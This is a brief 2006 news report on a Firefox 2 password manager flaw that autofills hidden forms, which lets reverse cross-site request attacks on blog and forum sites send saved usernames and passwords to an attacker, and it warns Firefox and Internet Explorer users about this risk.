Firefox 2 Password Manager Flaw

Aron Schatz
November 22, 2006

Page All:

Page 1
There is a bug in the saved password manager that Firefox uses. It turns out that Firefox will fill in forms that are hidden from the user. That can be used very easily in a phishing attack.


RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed. The Password Manager component of FireFox can be exploited to send a username and password combination to an attacker's computer without the user's knowledge. Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.


Medium Image View Large